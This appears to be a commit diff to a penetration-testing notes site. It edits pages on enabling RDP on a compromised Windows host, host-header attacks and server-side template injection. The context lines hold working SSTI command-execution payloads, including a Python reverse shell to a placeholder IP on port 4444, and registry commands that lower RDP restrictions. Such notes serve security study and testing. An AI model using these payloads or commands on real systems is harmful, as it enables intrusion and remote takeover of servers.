GITBOOK-626: change request with no subject merged in GitBook

SUMMARY.md

@@ -80,7 +80,7 @@
 * [Introduction](windows-privesc/active-directory/README.md)
 * [Checklist](active-directory/checklist.md)
 * [Enumeration](windows-privesc/active-directory/enumeration.md)
-* [Page](active-directory/page.md)
+* [Enable RDP](active-directory/enable-rdp.md)
 * [Kerberos](active-directory/kerberos.md)
 * [Rubeus](active-directory/rubeus.md)
 * [Credentials harvesting](windows-privesc/active-directory/local-credentials.md)

active-directory/page.md → active-directory/enable-rdp.md

@@ -1,4 +1,4 @@
-# Page
+# Enable RDP
 
 ## Enable RDP
 
@@ -14,16 +14,16 @@ If not present or set to 1 use the following command to change the key value to
 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 ```
 
-Disable restricted admin mode
+Configure firewall
 
 ```
-reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
+netsh firewall add portopening TCP 3389 "Remote Desktop"
 ```
 
-Configure firewall
+IF during connection the following error appears: "Account Restrictions are preventing this user from signing in." Enable restricted admin mode on the server
 
 ```
-netsh firewall add portopening TCP 3389 "Remote Desktop"
+reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
 ```
 
 ## Enable RDP for users <a href="#enable-rdp-for-users" id="enable-rdp-for-users"></a>

web-attacks/http.md

@@ -174,7 +174,7 @@ The host header is used to inform balancers and front end server to where to red
 * Check for host validation where only the url is validated and not the port `hostsite.com:evil`
 * Try to send a request with an url as part of an accepted subdomain `evil-hostsite.com` or `evilhostsite.com`
 * Duplicate the Host header
-* Add indentation before or after the header such as tabs spaces and \n
+* Add indentation before or after the header such as tabs spaces and 
 * Sending the request to a full url instead of a relative one may lead the server to parse the header differently
 
 ### Header overwrite

web-attacks/ssti.md

@@ -156,6 +156,7 @@ Newer versions
 {% set cmd = '<cmd>' %}
 {% endraw %}
 
+
 {% set bytes = (1).TYPE
      .forName('java.lang.Runtime')
      .methods[6]
@@ -348,6 +349,7 @@ x.exec('<cmd>')
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"<cmd>\", \"<args>\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
 {% endraw %}
 
+
 {{request.application.__globals__.__builtins__.__import__('os')['popen']('<cmd>')['read']()}}
 {{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('<cmd>')['read']()}}
 ```
@@ -360,6 +362,7 @@ Register the GET parameter
 {% raw %}
 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.<param>).read()}}{%endif%}{%endfor%}
 {% endraw %}
+
 ```
 
 Send a request containing the given parameter with the code to execute as value. For instance a request can be `<url>/?<param>=<code>`
@@ -386,6 +389,7 @@ Send a request containing the given parameter with the code to execute as value.
 {% raw %}
 {% import foobar %}
 {% endraw %}
+
 ```
 
 #### Command execution
@@ -414,7 +418,7 @@ x=os.popen('<cmd>').read()
 %>
 ```
 
-### Ruby - ERB&#x20;
+### Ruby - ERB
 
 #### Identification
 
@@ -506,8 +510,3 @@ ${7*7}
 [self.alert(1)]
 javascript:alert(1)%252f%252f..%252fcss-images
 ```
-
-
-
-
-